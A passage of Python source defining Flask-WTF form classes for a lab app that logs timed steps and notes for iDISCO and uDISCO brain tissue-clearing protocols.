blocking_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
blocking_start_roomtemp_notes_submit = SubmitField('Update Notes')
time_blocking_donkey_serum = OptionalDateTimeLocalField('10% DMSO / 6% Donkey seum / 0.2%TritonX-100 / 0.1%sodium azide / 1xPBS, R@37°C for 2-3 days')
time_blocking_donkey_serum_submit = SubmitField('Update')
blocking_donkey_serum_notes = TextAreaField('Notes',validators=[Length(max=100)])
blocking_donkey_serum_notes_submit = SubmitField('Update Notes')
""" Primary Antibody """
antibody1_date = OptionalDateField('Primary Antibody')
antibody1_date_submit = SubmitField('Push date to calendar (optional)')
antibody1_lot = TextAreaField('Enter the primary antibody lot code:',validators=[Length(max=64)])
antibody1_lot_submit = SubmitField('Update lot')
time_antibody1_start_roomtemp = OptionalDateTimeLocalField('Sample R@RT for ~1.5hrs')
time_antibody1_start_roomtemp_submit = SubmitField('Update')
antibody1_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
antibody1_start_roomtemp_notes_submit = SubmitField('Update Notes')
time_antibody1_ptwh_wash1 = OptionalDateTimeLocalField('PTwH R@RTx1hr (first hour)')
time_antibody1_ptwh_wash1_submit = SubmitField('Update')
antibody1_ptwh_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
antibody1_ptwh_wash1_notes_submit = SubmitField('Update Notes')
time_antibody1_ptwh_wash2 = OptionalDateTimeLocalField('PTwH R@RTx1hr (second hour)')
time_antibody1_ptwh_wash2_submit = SubmitField('Update')
antibody1_ptwh_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
antibody1_ptwh_wash2_notes_submit = SubmitField('Update Notes')
time_antibody1_added = OptionalDateTimeLocalField('Primary antibody (5% DMSO, 3% donkey serum in PTwH); 37C 7d')
time_antibody1_added_submit = SubmitField('Update')
antibody1_added_notes = TextAreaField('Notes',validators=[Length(max=100)])
antibody1_added_notes_submit = SubmitField('Update Notes')
""" Wash 1 """
wash1_date = OptionalDateField('Wash')
wash1_date_submit = SubmitField('Push date to calendar (optional)')
time_wash1_start_roomtemp = OptionalDateTimeLocalField('Sample R@RT for ~1.5hrs')
time_wash1_start_roomtemp_submit = SubmitField('Update')
wash1_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_start_roomtemp_notes_submit = SubmitField('Update Notes')
time_wash1_ptwh_wash1 = OptionalDateTimeLocalField('PTwH 10 min')
time_wash1_ptwh_wash1_submit = SubmitField('Update')
wash1_ptwh_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_ptwh_wash1_notes_submit = SubmitField('Update Notes')
time_wash1_ptwh_wash2 = OptionalDateTimeLocalField('PTwH 15 min')
time_wash1_ptwh_wash2_submit = SubmitField('Update')
wash1_ptwh_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_ptwh_wash2_notes_submit = SubmitField('Update Notes')
time_wash1_ptwh_wash3 = OptionalDateTimeLocalField('PTwH 30 min')
time_wash1_ptwh_wash3_submit = SubmitField('Update')
wash1_ptwh_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_ptwh_wash3_notes_submit = SubmitField('Update Notes')
time_wash1_ptwh_wash4 = OptionalDateTimeLocalField('PTwH 1 hr')
time_wash1_ptwh_wash4_submit = SubmitField('Update')
wash1_ptwh_wash4_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_ptwh_wash4_notes_submit = SubmitField('Update Notes')
time_wash1_ptwh_wash5 = OptionalDateTimeLocalField('PTwH 2 hr')
time_wash1_ptwh_wash5_submit = SubmitField('Update')
wash1_ptwh_wash5_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_ptwh_wash5_notes_submit = SubmitField('Update Notes')
time_wash1_ptwh_wash6 = OptionalDateTimeLocalField('Overnight wash')
time_wash1_ptwh_wash6_submit = SubmitField('Update')
wash1_ptwh_wash6_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_ptwh_wash6_notes_submit = SubmitField('Update Notes')
""" Secondary Antibody """
antibody2_date = OptionalDateField('Secondary Antibody')
antibody2_date_submit = SubmitField('Push date to calendar (optional)')
antibody2_lot = TextAreaField('Enter the secondary antibody lot code:',validators=[Length(max=64)])
antibody2_lot_submit = SubmitField('Update lot')
time_antibody2_added = OptionalDateTimeLocalField('2nd antibody solution R@37°C for 7 days (3% donkey serum/PTwH)')
time_antibody2_added_submit = SubmitField('Update')
antibody2_added_notes = TextAreaField('Notes',validators=[Length(max=100)])
antibody2_added_notes_submit = SubmitField('Update Notes')
""" Wash 2 """
wash2_date = OptionalDateField('Wash')
wash2_date_submit = SubmitField('Push date to calendar (optional)')
time_wash2_start_roomtemp = OptionalDateTimeLocalField('Sample R@RT for ~1.5hrs')
time_wash2_start_roomtemp_submit = SubmitField('Update')
wash2_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_start_roomtemp_notes_submit = SubmitField('Update Notes')
time_wash2_ptwh_wash1 = OptionalDateTimeLocalField('PTwH 10 min')
time_wash2_ptwh_wash1_submit = SubmitField('Update')
wash2_ptwh_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_ptwh_wash1_notes_submit = SubmitField('Update Notes')
time_wash2_ptwh_wash2 = OptionalDateTimeLocalField('PTwH 15 min')
time_wash2_ptwh_wash2_submit = SubmitField('Update')
wash2_ptwh_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_ptwh_wash2_notes_submit = SubmitField('Update Notes')
time_wash2_ptwh_wash3 = OptionalDateTimeLocalField('PTwH 30 min')
time_wash2_ptwh_wash3_submit = SubmitField('Update')
wash2_ptwh_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_ptwh_wash3_notes_submit = SubmitField('Update Notes')
time_wash2_ptwh_wash4 = OptionalDateTimeLocalField('PTwH 1 hr')
time_wash2_ptwh_wash4_submit = SubmitField('Update')
wash2_ptwh_wash4_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_ptwh_wash4_notes_submit = SubmitField('Update Notes')
time_wash2_ptwh_wash5 = OptionalDateTimeLocalField('PTwH 2 hr')
time_wash2_ptwh_wash5_submit = SubmitField('Update')
wash2_ptwh_wash5_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_ptwh_wash5_notes_submit = SubmitField('Update Notes')
time_wash2_ptwh_wash6 = OptionalDateTimeLocalField('Overnight wash')
time_wash2_ptwh_wash6_submit = SubmitField('Update')
wash2_ptwh_wash6_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_ptwh_wash6_notes_submit = SubmitField('Update Notes')
""" Clearing """
clearing_date = OptionalDateField('Clearing')
clearing_date_submit = SubmitField('Push date to calendar (optional)')
time_clearing_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
time_clearing_methanol_20percent_wash1_submit = SubmitField('Update')
clearing_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
time_clearing_methanol_40percent_wash1_submit = SubmitField('Update')
clearing_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
time_clearing_methanol_60percent_wash1_submit = SubmitField('Update')
clearing_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
time_clearing_methanol_80percent_wash1_submit = SubmitField('Update')
clearing_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (hour 1)')
time_clearing_methanol_100percent_wash1_submit = SubmitField('Update')
clearing_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (hour 2)')
time_clearing_methanol_100percent_wash2_submit = SubmitField('Update')
clearing_methanol_100percent_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
time_clearing_dcm_66percent_methanol_33percent = OptionalDateTimeLocalField('66% DCM / 33% methanol R@RTx3hrs')
time_clearing_dcm_66percent_methanol_33percent_submit = SubmitField('Update')
clearing_dcm_66percent_methanol_33percent_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_dcm_66percent_methanol_33percent_notes_submit = SubmitField('Update Notes')
time_clearing_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 1)')
time_clearing_dcm_wash1_submit = SubmitField('Update')
clearing_dcm_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_dcm_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_dcm_wash2 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 2)')
time_clearing_dcm_wash2_submit = SubmitField('Update')
clearing_dcm_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_dcm_wash2_notes_submit = SubmitField('Update Notes')
time_clearing_dbe = OptionalDateTimeLocalField('100% DBE > hr')
time_clearing_dbe_submit = SubmitField('Update')
clearing_dbe_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_dbe_notes_submit = SubmitField('Update Notes')
time_clearing_new_tubes = OptionalDateTimeLocalField('put brains in new tubes with prepoured 100% DBE no rocking')
time_clearing_new_tubes_submit = SubmitField('Update')
clearing_new_tubes_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_new_tubes_notes_submit = SubmitField('Update Notes')
clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
clearing_notes_submit = SubmitField('Update')
submit = SubmitField('Submit')
class iDiscoAbbreviatedForm(FlaskForm):
""" The form for entering clearing information """
title = 'iDISCO for non-oxidative fluorophores (abbreviated clearing)'
exp_notes = TextAreaField('Experiment Notes: If anything unusual happened during \
the experiment that might affect clearing, please note it here.',validators=[Length(max=500)])
exp_notes_submit = SubmitField('Update')
pbs_date = OptionalDateField('PBS wash')
pbs_date_submit = SubmitField('Push date to calendar (optional)')
time_pbs_wash1 = OptionalDateTimeLocalField('Wash 1')
time_pbs_wash1_submit = SubmitField('Update')
pbs_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
pbs_wash1_notes_submit = SubmitField('Update Notes')
time_pbs_wash2 = OptionalDateTimeLocalField('Wash 2')
time_pbs_wash2_submit = SubmitField('Update')
pbs_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
pbs_wash2_notes_submit = SubmitField('Update Notes')
time_pbs_wash3 = OptionalDateTimeLocalField('Wash 3')
time_pbs_wash3_submit = SubmitField('Update')
pbs_wash3_notes = TextAreaField('Notes:',validators=[Length(max=250)])
pbs_wash3_notes_submit = SubmitField('Update Notes')
dehydr_date = OptionalDateField('Dehydration')
dehydr_date_submit = SubmitField('Push date to calendar (optional)')
time_dehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
time_dehydr_methanol_20percent_wash1_submit = SubmitField('Update')
dehydr_methanol_20percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
time_dehydr_methanol_40percent_wash1_submit = SubmitField('Update')
dehydr_methanol_40percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
time_dehydr_methanol_60percent_wash1_submit = SubmitField('Update')
dehydr_methanol_60percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
time_dehydr_methanol_80percent_wash1_submit = SubmitField('Update')
dehydr_methanol_80percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (first hour)')
time_dehydr_methanol_100percent_wash1_submit = SubmitField('Update')
dehydr_methanol_100percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (second hour)')
time_dehydr_methanol_100percent_wash2_submit = SubmitField('Update')
dehydr_methanol_100percent_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
time_dehydr_dcm_66percent_methanol_33percent = OptionalDateTimeLocalField('66% DCM / 33% methanol R@RTx3hrs')
time_dehydr_dcm_66percent_methanol_33percent_submit = SubmitField('Update')
dehydr_dcm_66percent_methanol_33percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_dcm_66percent_methanol_33percent_notes_submit = SubmitField('Update Notes')
time_dehydr_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 1)')
time_dehydr_dcm_wash1_submit = SubmitField('Update')
dehydr_dcm_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_dcm_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_dcm_wash2 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 2)')
time_dehydr_dcm_wash2_submit = SubmitField('Update')
dehydr_dcm_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_dcm_wash2_notes_submit = SubmitField('Update Notes')
time_dehydr_dbe_wash1 = OptionalDateTimeLocalField('100% DBE > hr')
time_dehydr_dbe_wash1_submit = SubmitField('Update')
dehydr_dbe_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_dbe_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_dbe_wash2 = OptionalDateTimeLocalField('100% DBE no rocking')
time_dehydr_dbe_wash2_submit = SubmitField('Update')
dehydr_dbe_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_dbe_wash2_notes_submit = SubmitField('Update Notes')
clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
clearing_notes_submit = SubmitField('Update')
submit = SubmitField('Submit')
class iDiscoAbbreviatedRatForm(FlaskForm):
""" The form for entering clearing information """
title = 'Rat: iDISCO for non-oxidative fluorophores (abbreviated clearing)'
exp_notes = TextAreaField('Experiment Notes: If anything unusual happened \
during the experiment that might affect clearing, please note it here.',validators=[Length(max=500)])
exp_notes_submit = SubmitField('Update')
pbs_date = OptionalDateField('PBS wash')
pbs_date_submit = SubmitField('Push date to calendar (optional)')
time_pbs_wash1 = OptionalDateTimeLocalField('1xPBS R@RT30min')
time_pbs_wash1_submit = SubmitField('Update')
pbs_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
pbs_wash1_notes_submit = SubmitField('Update Notes')
time_pbs_wash2 = OptionalDateTimeLocalField('1xPBS R@RT30min')
time_pbs_wash2_submit = SubmitField('Update')
pbs_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
pbs_wash2_notes_submit = SubmitField('Update Notes')
time_pbs_wash3 = OptionalDateTimeLocalField('1xPBS R@RT30min')
time_pbs_wash3_submit = SubmitField('Update')
pbs_wash3_notes = TextAreaField('Notes:',validators=[Length(max=250)])
pbs_wash3_notes_submit = SubmitField('Update Notes')
dehydr_date = OptionalDateField('Dehydration')
dehydr_date_submit = SubmitField('Push date to calendar (optional)')
time_dehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTX24hrs')
time_dehydr_methanol_20percent_wash1_submit = SubmitField('Update')
dehydr_methanol_20percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
# time_dehydr_methanol_20percent_wash2 = OptionalDateTimeLocalField(Markup('<strike>20% methanol R@RTX3hrs (wash 2/2)</strike>'))
# time_dehydr_methanol_20percent_wash2_submit = SubmitField('Update')
# dehydr_methanol_20percent_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
# dehydr_methanol_20percent_wash2_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTX24hrs')
time_dehydr_methanol_40percent_wash1_submit = SubmitField('Update')
dehydr_methanol_40percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
# time_dehydr_methanol_40percent_wash2 = OptionalDateTimeLocalField(Markup('<strike>40% methanol R@RTX3hrs (wash 2/2)</strike>'))
# time_dehydr_methanol_40percent_wash2_submit = SubmitField('Update')
# dehydr_methanol_40percent_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
# dehydr_methanol_40percent_wash2_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTX24hrs')
time_dehydr_methanol_60percent_wash1_submit = SubmitField('Update')
dehydr_methanol_60percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTX24hrs')
time_dehydr_methanol_80percent_wash1_submit = SubmitField('Update')
dehydr_methanol_80percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
# time_dehydr_methanol_80percent_wash2 = OptionalDateTimeLocalField(Markup('<strike>80% methanol R@RTX24hrs (wash 2/2)</strike>'))
# time_dehydr_methanol_80percent_wash2_submit = SubmitField('Update')
# dehydr_methanol_80percent_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
# dehydr_methanol_80percent_wash2_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTX24hrs')
time_dehydr_methanol_100percent_wash1_submit = SubmitField('Update')
dehydr_methanol_100percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_peroxide_wash1 = OptionalDateTimeLocalField('5% peroxide / Methanol (1 part 30% peroxide: 5 parts 100% methanol) ')
time_dehydr_peroxide_wash1_submit = SubmitField('Update')
dehydr_peroxide_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_peroxide_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTX24hrs')
time_dehydr_methanol_100percent_wash2_submit = SubmitField('Update')
dehydr_methanol_100percent_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
# time_dehydr_methanol_100percent_wash3 = OptionalDateTimeLocalField('100% methanol R@RTX24hrs')
# time_dehydr_methanol_100percent_wash3_submit = SubmitField('Update')
# dehydr_methanol_100percent_wash3_notes = TextAreaField('Notes:',validators=[Length(max=250)])
# dehydr_methanol_100percent_wash3_notes_submit = SubmitField('Update Notes')
# time_dehydr_methanol_100percent_wash4 = OptionalDateTimeLocalField('100% methanol R@RTX24hrs')
# time_dehydr_methanol_100percent_wash4_submit = SubmitField('Update')
# dehydr_methanol_100percent_wash4_notes = TextAreaField('Notes:',validators=[Length(max=250)])
# dehydr_methanol_100percent_wash4_notes_submit = SubmitField('Update Notes')
# time_dehydr_methanol_100percent_wash5 = OptionalDateTimeLocalField('100% methanol R@RTX2hrs (or overnight)')
# time_dehydr_methanol_100percent_wash5_submit = SubmitField('Update')
# dehydr_methanol_100percent_wash5_notes = TextAreaField('Notes:',validators=[Length(max=250)])
# dehydr_methanol_100percent_wash5_notes_submit = SubmitField('Update Notes')
time_dehydr_dcm_66percent_methanol_33percent = OptionalDateTimeLocalField('66% DCM / 33% methanol R@RTx24hrs')
time_dehydr_dcm_66percent_methanol_33percent_submit = SubmitField('Update')
dehydr_dcm_66percent_methanol_33percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_dcm_66percent_methanol_33percent_notes_submit = SubmitField('Update Notes')
time_dehydr_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RTx24hrs')
time_dehydr_dcm_wash1_submit = SubmitField('Update')
dehydr_dcm_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_dcm_wash1_notes_submit = SubmitField('Update Notes')
# time_dehydr_dcm_wash2 = OptionalDateTimeLocalField('100% DCM R@RTx1hr (wash 2)')
# time_dehydr_dcm_wash2_submit = SubmitField('Update')
# dehydr_dcm_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
# dehydr_dcm_wash2_notes_submit = SubmitField('Update Notes')
time_dehydr_dbe_wash1 = OptionalDateTimeLocalField('100% DBE - 24 hrs')
time_dehydr_dbe_wash1_submit = SubmitField('Update')
dehydr_dbe_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_dbe_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_dbe_wash2 = OptionalDateTimeLocalField('Put brains in new tubes with prepoured 100% DBE no rocking')
time_dehydr_dbe_wash2_submit = SubmitField('Update')
dehydr_dbe_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_dbe_wash2_notes_submit = SubmitField('Update Notes')
clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
clearing_notes_submit = SubmitField('Update')
submit = SubmitField('Submit')
class uDiscoForm(FlaskForm):
""" The form for entering clearing information """
title = 'uDISCO'
exp_notes = TextAreaField('Experiment Notes: If anything unusual happened \
during the experiment that might affect clearing, please note it here:',validators=[Length(max=500)])
exp_notes_submit = SubmitField('Update')
dehydr_date = OptionalDateField('Dehydration')
dehydr_date_submit = SubmitField('Push date to calendar (optional)')
time_dehydr_pbs_wash1 = OptionalDateTimeLocalField('0.1M PBS R@RT5min')
time_dehydr_pbs_wash1_submit = SubmitField('Update')
dehydr_pbs_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_30percent = OptionalDateTimeLocalField('30% t-butanol R@35C O/N')
time_dehydr_butanol_30percent_submit = SubmitField('Update')
dehydr_butanol_30percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_30percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_50percent = OptionalDateTimeLocalField('50% t-butanol R@35C 10 h')
time_dehydr_butanol_50percent_submit = SubmitField('Update')
dehydr_butanol_50percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_50percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_70percent = OptionalDateTimeLocalField('70% t-butanol R@35C O/N')
time_dehydr_butanol_70percent_submit = SubmitField('Update')
dehydr_butanol_70percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_70percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_80percent = OptionalDateTimeLocalField('80% t-butanol R@35C 10 h')
time_dehydr_butanol_80percent_submit = SubmitField('Update')
dehydr_butanol_80percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_80percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_90percent = OptionalDateTimeLocalField('90% t-butanol R@35C O/N')
time_dehydr_butanol_90percent_submit = SubmitField('Update')
dehydr_butanol_90percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_90percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_96percent = OptionalDateTimeLocalField('96% t-butanol R@35C 10 h')
time_dehydr_butanol_96percent_submit = SubmitField('Update')
dehydr_butanol_96percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_96percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_100percent = OptionalDateTimeLocalField('100% t-butanol R@35C O/N')
time_dehydr_butanol_100percent_submit = SubmitField('Update')
dehydr_butanol_100percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_100percent_notes_submit = SubmitField('Update Notes')
clearing_date = OptionalDateField('Clearing')
clearing_date_submit = SubmitField('Push date to calendar (optional)')
time_clearing_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RT 50-70min')
time_clearing_dcm_wash1_submit = SubmitField('Update')
clearing_dcm_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
clearing_dcm_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_babb_wash1 = OptionalDateTimeLocalField('BABB-D10 >3hrs')
time_clearing_babb_wash1_submit = SubmitField('Update')
clearing_babb_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
clearing_babb_wash1_notes_submit = SubmitField('Update Notes')
clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
clearing_notes_submit = SubmitField('Update Notes')
submit = SubmitField('Submit')
class uDiscoRatForm(FlaskForm):
""" The form for entering clearing information """
title = 'Rat uDISCO'
exp_notes = TextAreaField('Experiment Notes: If anything unusual happened \
during the experiment that might affect clearing, please note it here:',validators=[Length(max=500)])
exp_notes_submit = SubmitField('Update')
dehydr_date = OptionalDateField('Dehydration')
dehydr_date_submit = SubmitField('Push date to calendar (optional)')
time_dehydr_pbs_wash1 = OptionalDateTimeLocalField('0.1M PBS R@RT 30 mins')
time_dehydr_pbs_wash1_submit = SubmitField('Update')
dehydr_pbs_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_30percent = OptionalDateTimeLocalField('30% t-butanol R@35C O/N 24 hrs')
time_dehydr_butanol_30percent_submit = SubmitField('Update')
dehydr_butanol_30percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_30percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_50percent = OptionalDateTimeLocalField('50% t-butanol R@35C 24 hrs')
time_dehydr_butanol_50percent_submit = SubmitField('Update')
dehydr_butanol_50percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_50percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_70percent = OptionalDateTimeLocalField('70% t-butanol R@35C O/N 24 hrs')
time_dehydr_butanol_70percent_submit = SubmitField('Update')
dehydr_butanol_70percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_70percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_80percent = OptionalDateTimeLocalField('80% t-butanol R@35C 24 hrs')
time_dehydr_butanol_80percent_submit = SubmitField('Update')
dehydr_butanol_80percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_80percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_90percent = OptionalDateTimeLocalField('90% t-butanol R@35C O/N 24 hrs')
time_dehydr_butanol_90percent_submit = SubmitField('Update')
dehydr_butanol_90percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_90percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_96percent = OptionalDateTimeLocalField('96% t-butanol R@35C 24 hrs')
time_dehydr_butanol_96percent_submit = SubmitField('Update')
dehydr_butanol_96percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_96percent_notes_submit = SubmitField('Update Notes')
time_dehydr_butanol_100percent = OptionalDateTimeLocalField('100% t-butanol R@35C O/N 24 hrs')
time_dehydr_butanol_100percent_submit = SubmitField('Update')
dehydr_butanol_100percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
dehydr_butanol_100percent_notes_submit = SubmitField('Update Notes')
clearing_date = OptionalDateField('Clearing')
clearing_date_submit = SubmitField('Push date to calendar (optional)')
time_clearing_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RT 2.5-3 hrs')
time_clearing_dcm_wash1_submit = SubmitField('Update')
clearing_dcm_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
clearing_dcm_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_babb_wash1 = OptionalDateTimeLocalField('BABB-D15 > 3hrs')
time_clearing_babb_wash1_submit = SubmitField('Update')
clearing_babb_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
clearing_babb_wash1_notes_submit = SubmitField('Update Notes')
clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
clearing_notes_submit = SubmitField('Update Notes')
submit = SubmitField('Submit')
class iDiscoEduForm(FlaskForm):
""" The form for entering clearing information """
title = 'iDISCO+ Immunostaining'
exp_notes = TextAreaField('Experiment Notes: If anything unusual happened during the \
experiment that might affect clearing, please note it here.',validators=[Length(max=500)])
exp_notes_submit = SubmitField('Update')
dehydr_date = OptionalDateField('Dehydration')
dehydr_date_submit = SubmitField('Push date to calendar (optional)')
